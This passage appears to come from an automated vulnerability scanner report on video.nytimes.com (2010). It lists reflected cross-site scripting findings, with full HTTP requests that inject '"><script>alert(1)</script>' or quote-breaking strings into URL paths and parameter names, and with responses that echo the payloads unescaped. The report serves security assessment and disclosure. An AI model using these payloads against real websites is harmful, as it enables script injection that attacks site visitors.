Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:57 GMT
Content-type: text/html
Content-Length: 249683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html?1952e"><script>alert(1)</script>8858d469260=1">
...[SNIP]...

3.297. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33882"><script>alert(1)</script>31caca2eed2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201033882"><script>alert(1)</script>31caca2eed2/10/21/continuous/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:05 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201033882"><script>alert(1)</script>31caca2eed2/10/21/continuous/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.298. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77329"><script>alert(1)</script>7987dd68833 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/1077329"><script>alert(1)</script>7987dd68833/21/continuous/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:27 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/1077329"><script>alert(1)</script>7987dd68833/21/continuous/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.299. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c4f"><script>alert(1)</script>6923e40337c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/2125c4f"><script>alert(1)</script>6923e40337c/continuous/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:45 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/2125c4f"><script>alert(1)</script>6923e40337c/continuous/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.300. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c66a5"%3ba06b7ba14 was submitted in the REST URL parameter 5. This input was echoed as c66a5";a06b7ba14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/21/continuousc66a5"%3ba06b7ba14/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:38 GMT
Content-type: text/html
Content-Length: 226211

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytcontinuousc66a5";a06b7ba14";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "continuousc66a5";a06b7ba14";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.301. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a06d3"><script>alert(1)</script>3ccfb4ead35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/21/continuousa06d3"><script>alert(1)</script>3ccfb4ead35/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:32 GMT
Content-type: text/html
Content-Length: 226338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/21/continuousa06d3"><script>alert(1)</script>3ccfb4ead35/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.302. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d5a0'%3b2a2f1650b63 was submitted in the REST URL parameter 5. This input was echoed as 2d5a0';2a2f1650b63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/10/21/continuous2d5a0'%3b2a2f1650b63/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:13 GMT
Content-type: text/html
Content-Length: 226221

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
sion%20with%20Tamaryn.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'continuous2d5a0';2a2f1650b63' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.303. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6809"><script>alert(1)</script>5e5ac7ec891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html?a6809"><script>alert(1)</script>5e5ac7ec891=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:15:08 GMT
Content-type: text/html
Content-Length: 226172

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html?a6809"><script>alert(1)</script>5e5ac7ec891=1">
...[SNIP]...

3.304. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f213"><script>alert(1)</script>45ea0455716 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/20107f213"><script>alert(1)</script>45ea0455716/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:53 GMT
Content-type: text/html
Content-Length: 233658

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/20107f213"><script>alert(1)</script>45ea0455716/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.305. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca6e9"><script>alert(1)</script>52b1c451e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10ca6e9"><script>alert(1)</script>52b1c451e/22/dining/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:15 GMT
Content-type: text/html
Content-Length: 233654

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10ca6e9"><script>alert(1)</script>52b1c451e/22/dining/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.306. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 767f2"><script>alert(1)</script>c70020ad194 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22767f2"><script>alert(1)</script>c70020ad194/dining/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:28 GMT
Content-type: text/html
Content-Length: 233658

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22767f2"><script>alert(1)</script>c70020ad194/dining/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.307. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 285f1"><script>alert(1)</script>ee39669c993 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22/dining285f1"><script>alert(1)</script>ee39669c993/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:10 GMT
Content-type: text/html
Content-Length: 249638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22/dining285f1"><script>alert(1)</script>ee39669c993/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.308. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c34'%3b002fe85984d was submitted in the REST URL parameter 5. This input was echoed as 55c34';002fe85984d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

